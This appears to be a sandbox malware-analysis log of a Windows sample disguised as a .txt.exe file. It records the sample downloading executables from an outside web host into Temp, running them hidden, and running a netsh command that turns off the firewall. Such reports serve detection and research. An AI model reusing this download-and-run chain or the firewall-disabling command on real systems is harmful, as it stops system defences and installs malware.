File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 41044 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 41044 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 41044 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 23360 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 23360 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 23360 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 35204 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 35204 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 35204 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 8924 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 8924 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 8924 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 6004 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 6004 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 6004 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 17848 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 17848 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 17848 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1460 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1460 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1460 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1460 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1460 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1460 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 61724 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 22064 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 22064 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 22064 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 16060 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 16060 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 16060 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 52724 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 52724 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 52724 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 2920 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 2920 True 1 Fn Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1 Fn Data
Inet Read Response size = 65536, size_out = 65536 True 1 Fn Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1 Fn Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 64360 True 1 Fn Data
Socket Receive flags = NO_FLAG_SET, size = 49411, size_out = 8924 True 1 Fn Data
Inet Read Response size = 49411, size_out = 8924 True 1 Fn Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 8924 True 1 Fn Data
Socket Receive flags = NO_FLAG_SET, size = 40487, size_out = 3752 True 1 Fn Data
Inet Read Response size = 40487, size_out = 3752 True 1 Fn Data
Socket Receive flags = NO_FLAG_SET, size = 36735, size_out = 34208 True 1 Fn Data
Inet Read Response size = 36735, size_out = 34208 True 1 Fn Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1 Fn Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 33864 True 1 Fn Data
Socket Receive flags = NO_FLAG_SET, size = 2527, size_out = 2527 True 1 Fn Data
Inet Read Response size = 2527, size_out = 2527 True 1 Fn Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 2527 True 1 Fn Data
Process Create process_name = "C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe", os_pid = 0xba4, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE True 1 Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, type = file_attributes False 1 Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1 Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, type = file_type True 2 Fn
Socket Close type = SOCK_STREAM True 1 Fn
Inet Close Session - True 1 Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1 Fn
Socket Connect remote_address = 54.191.17.130, remote_port = 80 True 1 Fn
Socket Close type = SOCK_STREAM True 1 Fn
Socket Send flags = NO_FLAG_SET, size = 50, size_out = 50 True 1 Fn Data
Inet Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1 Fn
Inet Open Connection protocol = http, server_name = www.myswcd.com, server_port = 80 True 1 Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /vol/v2.exe True 1 Fn
Inet Send HTTP Request headers = host: www.myswcd.com, url = www.myswcd.com/vol/v2.exe True 1 Fn Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 4096 True 1 Fn Data
Inet Read Response size = 4096, size_out = 4096 True 1 Fn Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 4664 True 1 Fn Data
Inet Read Response size = 65536, size_out = 4664 True 1 Fn Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, size = 4096 True 1 Fn Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, size = 4391 True 1 Fn Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1 Fn Data
Inet Read Response size = 65536, size_out = 65536 True 1 Fn Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, size = 65536 True 1 Fn Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 39584 True 1 Fn Data
Inet Read Response size = 65536, size_out = 39584 True 1 Fn Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, size = 39584 True 1 Fn Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1 Fn Data
Inet Read Response size = 65536, size_out = 65536 True 1 Fn Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, size = 65536 True 1 Fn Data
Socket Receive flags = NO_FLAG_SET, size = 39481, size_out = 7464 True 1 Fn Data
Inet Read Response size = 39481, size_out = 7464 True 1 Fn Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, size = 7464 True 1 Fn Data
Socket Receive flags = NO_FLAG_SET, size = 32017, size_out = 32017 True 1 Fn Data
Inet Read Response size = 32017, size_out = 32017 True 1 Fn Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, size = 32017 True 1 Fn Data
Process Create process_name = "C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe", os_pid = 0xbf4, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE True 1 Fn
Thread 0xa40
17 6
Category Operation Information Success Count Logfile
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Socket Close type = SOCK_STREAM True 1 Fn
Inet Close Session - True 1 Fn
Socket Close type = SOCK_DGRAM True 1 Fn
Socket Close type = SOCK_DGRAM True 1 Fn
Module Unmap process_name = c:\users\eebsym5\desktop\output.113528456.txt.exe True 1 Fn
Socket Close type = SOCK_DGRAM True 1 Fn
Module Unmap process_name = c:\users\eebsym5\desktop\output.113528456.txt.exe True 1 Fn
Socket Close type = SOCK_DGRAM True 1 Fn
Thread 0xa44
1 0
Category Operation Information Success Count Logfile
Process Create process_name = cmd.exe, show_window = SW_HIDE True 1 Fn
Process #2: cmd.exe
59 0
Information Value
ID #2
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c netsh Advfirewall set allprofiles state off
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:00:43, Reason: Child Process
Unmonitor End Time: 00:01:00, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
Information Value
PID 0xa54
Parent PID 0x9a4 (c:\users\eebsym5\desktop\output.113528456.txt.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xA58
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000050000 0x00050000 0x00056fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory rw True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory rw True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory rw True False False -
private_0x00000000000b0000 0x000b0000 0x001affff Private Memory rw True False False -
locale.nls 0x001b0000 0x00216fff Memory Mapped File r False False False -
pagefile_0x0000000000220000 0x00220000 0x002e7fff Pagefile Backed Memory r True False False -
private_0x0000000000370000 0x00370000 0x0046ffff Private Memory rw True False False -
pagefile_0x0000000000470000 0x00470000 0x00570fff Pagefile Backed Memory r True False False -
private_0x0000000000610000 0x00610000 0x0061ffff Private Memory rw True False False -
pagefile_0x0000000000620000 0x00620000 0x0121ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001220000 0x01220000 0x01382fff Pagefile Backed Memory r True False False -
sortdefault.nls 0x01390000 0x0165efff Memory Mapped File r False False False -
cmd.exe 0x4a960000 0x4a9abfff Memory Mapped File rwx True False False -
winbrand.dll 0x71f40000 0x71f46fff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
Threads
Thread 0xa58
59 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-08-10 04:08:46 (UTC) True 1 Fn
System Get Time type = Ticks, time = 106891 True 1 Fn
Module Get Handle module_name = c:\windows\system32\cmd.exe, base_address = 0x4a960000 True 1 Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x76910000 True 1 Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x769624c2 True 1 Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1 Fn
File Open filename = STD_OUTPUT_HANDLE True 3 Fn
File Open filename = STD_INPUT_HANDLE True 2 Fn
Environment Get Environment String - True 2 Fn Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 192, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1 Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1 Fn
Module Get Filename process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1 Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1 Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1 Fn
Environment Get Environment String name = PROMPT False 1 Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1 Fn
Environment Get Environment String - True 1 Fn Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1 Fn
Environment Get Environment String name = KEYS False 1 Fn
File Get Info filename = C:\Users\EEBsYm5\Desktop, type = file_attributes True 2 Fn
Environment Set Environment String name = =C:, value = C:\Users\EEBsYm5\Desktop True 1 Fn
Environment Get Environment String - True 1 Fn Data
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x76910000 True 1 Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x7694ac6c True 1 Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76953ea8 True 1 Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76962732 True 1 Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1 Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1 Fn
Process Create process_name = C:\Windows\system32\netsh.exe, os_pid = 0xa70, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1 Fn
Environment Set Environment String name = COPYCMD True 1 Fn
Environment Get Environment String - True 1 Fn Data
Environment Set Environment String name = =ExitCode, value = 00000000 True 1 Fn
Environment Get Environment String - True 1 Fn Data
Environment Set Environment String name = =ExitCodeAscii True 1 Fn
Environment Get Environment String - True 1 Fn Data
File Open filename = STD_OUTPUT_HANDLE True 2 Fn
File Open filename = STD_INPUT_HANDLE True 1 Fn
Process #3: netsh.exe
77 0
Information Value
ID #3
File Name c:\windows\system32\netsh.exe
Command Line netsh Advfirewall set allprofiles state off
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:00:43, Reason: Child Process
Unmonitor End Time: 00:01:00, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
Information Value
PID 0xa70
Parent PID 0xa54 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xA74
0xA88
0xA94
0xA98
0xA9C
0xAA0
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory rw True False False -
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory r True False False -
locale.nls 0x00150000 0x001b6fff Memory Mapped File r False False False -
pagefile_0x00000000001c0000 0x001c0000 0x001c6fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory rw True False False -
netsh.exe.mui 0x001e0000 0x001e4fff Memory Mapped File rw False False False -
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory rw True False False -
private_0x0000000000200000 0x00200000 0x00200fff Private Memory rw True False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory rw True False False -
pagefile_0x0000000000220000 0x00220000 0x00221fff Pagefile Backed Memory r True False False -
odbcint.dll.mui 0x00230000 0x0023afff Memory Mapped File rw False False False -
pagefile_0x0000000000240000 0x00240000 0x00241fff Pagefile Backed Memory r True False False -
mfc42u.dll.mui 0x00250000 0x00257fff Memory Mapped File rw False False False -
pagefile_0x0000000000260000 0x00260000 0x00260fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000270000 0x00270000 0x00271fff Pagefile Backed Memory r True False False -
private_0x0000000000280000 0x00280000 0x0037ffff Private Memory rw True False False -
pagefile_0x0000000000380000 0x00380000 0x00447fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000450000 0x00450000 0x00550fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000560000 0x00560000 0x0115ffff Pagefile Backed Memory r True False False -
private_0x0000000001160000 0x01160000 0x0123ffff Private Memory rw True False False -
private_0x0000000001160000 0x01160000 0x011cffff Private Memory rw True False False -
private_0x0000000001160000 0x01160000 0x01161fff Private Memory rw True False False -
private_0x0000000001190000 0x01190000 0x011cffff Private Memory rw True False False -
private_0x0000000001200000 0x01200000 0x0123ffff Private Memory rw True False False -
private_0x0000000001240000 0x01240000 0x0131ffff Private Memory rw True False False -
private_0x0000000001240000 0x01240000 0x012bffff Private Memory rw True False False -
private_0x00000000012e0000 0x012e0000 0x0131ffff Private Memory rw True False False -
private_0x0000000001320000 0x01320000 0x0138ffff Private Memory rw True False False -
private_0x0000000001390000 0x01390000 0x0148ffff Private Memory rw True False False -
private_0x0000000001490000 0x01490000 0x0159ffff Private Memory rw True False False -
netsh.exe 0x01620000 0x0163afff Memory Mapped File rwx True False False -
private_0x0000000001640000 0x01640000 0x0186ffff Private Memory rw True False False -
private_0x0000000001640000 0x01640000 0x0176ffff Private Memory rw True False False -
private_0x0000000001640000 0x01640000 0x0171ffff Private Memory rw True False False -
private_0x0000000001760000 0x01760000 0x0176ffff Private Memory rw True False False -
private_0x0000000001830000 0x01830000 0x0186ffff Private Memory rw True False False -
sortdefault.nls 0x01870000 0x01b3efff Memory Mapped File r False False False -
pagefile_0x0000000001b40000 0x01b40000 0x01f32fff Pagefile Backed Memory r True False False -
private_0x0000000001f40000 0x01f40000 0x020bffff Private Memory rw True False False -
private_0x0000000001f40000 0x01f40000 0x0209ffff Private Memory rw True False False -
private_0x00000000020b0000 0x020b0000 0x020bffff Private Memory rw True False False -
private_0x0000000002210000 0x02210000 0x0230ffff Private Memory rw True False False -
p2pnetsh.dll 0x6b440000 0x6b464fff Memory Mapped File rwx False False False -
tdh.dll 0x6b470000 0x6b507fff Memory Mapped File rwx False False False -
ndfapi.dll 0x6b510000 0x6b543fff Memory Mapped File rwx False False False -
nettrace.dll 0x6b550000 0x6b5d9fff Memory Mapped File rwx False False False -
polstore.dll 0x6b5e0000 0x6b625fff Memory Mapped File rwx False False False -
adsldpc.dll 0x6b630000 0x6b663fff Memory Mapped File rwx False False False -
activeds.dll 0x6b670000 0x6b6a4fff Memory Mapped File rwx False False False -
nshipsec.dll 0x6b6b0000 0x6b708fff Memory Mapped File rwx False False False -
certcli.dll 0x6b710000 0x6b765fff Memory Mapped File rwx False False False -
napmontr.dll 0x6b770000 0x6b798fff Memory Mapped File rwx False False False -
wcnnetsh.dll 0x6da80000 0x6da89fff Memory Mapped File rwx False False False -
eappprxy.dll 0x6da90000 0x6daa0fff Memory Mapped File rwx False False False -
onex.dll 0x6dab0000 0x6dae3fff Memory Mapped File rwx False False False -
eappcfg.dll 0x6daf0000 0x6db1efff Memory Mapped File rwx False False False -
dot3api.dll 0x6db20000 0x6db39fff Memory Mapped File rwx False False False -
dot3cfg.dll 0x6db40000 0x6db56fff Memory Mapped File rwx False False False -
rpcnsh.dll 0x6db60000 0x6db6afff Memory Mapped File rwx False False False -
hnetmon.dll 0x6db70000 0x6db76fff Memory Mapped File rwx False False False -
netiohlp.dll 0x6db80000 0x6dbabfff Memory Mapped File rwx False False False -
authfwcfg.dll 0x6dbb0000 0x6dc03fff Memory Mapped File rwx False False False -
mfc42u.dll 0x6dc10000 0x6dd2efff Memory Mapped File rwx False False False -
whhelper.dll 0x6dd30000 0x6dd36fff Memory Mapped File rwx False False False -
fwcfg.dll 0x6dd40000 0x6dd50fff Memory Mapped File rwx False False False -
nshwfp.dll 0x6dd60000 0x6de03fff Memory Mapped File rwx False False False -
odbcint.dll 0x6de10000 0x6de47fff Memory Mapped File rwx False False False -
credui.dll 0x6de50000 0x6de7afff Memory Mapped File rwx False False False -
winipsec.dll 0x6e160000 0x6e173fff Memory Mapped File rwx False False False -
dhcpqec.dll 0x6e440000 0x6e456fff Memory Mapped File rwx False False False -
odbc32.dll 0x6e460000 0x6e4ebfff Memory Mapped File rwx False False False -
httpapi.dll 0x6e820000 0x6e82afff Memory Mapped File rwx False False False -
ifmon.dll 0x6ee80000 0x6ee88fff Memory Mapped File rwx False False False -
nshhttp.dll 0x6ee90000 0x6ee99fff Memory Mapped File rwx False False False -
nci.dll 0x6eed0000 0x6eee5fff Memory Mapped File rwx False False False -
rasmontr.dll 0x6f8d0000 0x6f8fdfff Memory Mapped File rwx False False False -
webio.dll 0x6fcf0000 0x6fd3efff Memory Mapped File rwx False False False -
winhttp.dll 0x6fd40000 0x6fd97fff Memory Mapped File rwx False False False -
wdi.dll 0x6fff0000 0x70004fff Memory Mapped File rwx False False False -
mpr.dll 0x71d30000 0x71d41fff Memory Mapped File rwx False False False -
ws2help.dll 0x71f20000 0x71f22fff Memory Mapped File rwx False False False -
dhcpcmonitor.dll 0x71f30000 0x71f35fff Memory Mapped File rwx False False False -
wshelper.dll 0x71f50000 0x71f56fff Memory Mapped File rwx False False False -
wlanutil.dll 0x72560000 0x72565fff Memory Mapped File rwx False False False -
wlanapi.dll 0x72570000 0x72585fff Memory Mapped File rwx False False False -
rasman.dll 0x725f0000 0x72604fff Memory Mapped File rwx False False False -
rasapi32.dll 0x72610000 0x72661fff Memory Mapped File rwx False False False -
mprapi.dll 0x72670000 0x72698fff Memory Mapped File rwx False False False -
qutil.dll 0x727c0000 0x727d6fff Memory Mapped File rwx False False False -
netshell.dll 0x729e0000 0x72c44fff Memory Mapped File rwx False False False -
dhcpcsvc.dll 0x73670000 0x73681fff Memory Mapped File rwx False False False -
dhcpcsvc6.dll 0x73690000 0x7369cfff Memory Mapped File rwx False False False -
fwpuclnt.dll 0x736b0000 0x736e7fff Memory Mapped File rwx False False False -
winnsi.dll 0x737c0000 0x737c6fff Memory Mapped File rwx False False False -
iphlpapi.dll 0x737d0000 0x737ebfff Memory Mapped File rwx False False False -
slc.dll 0x73870000 0x73879fff Memory Mapped File rwx False False False -
atl.dll 0x738a0000 0x738b3fff Memory Mapped File rwx False False False -
nlaapi.dll 0x738f0000 0x738fffff Memory Mapped File rwx False False False -
wkscli.dll 0x73c40000 0x73c4efff Memory Mapped File rwx False False False -
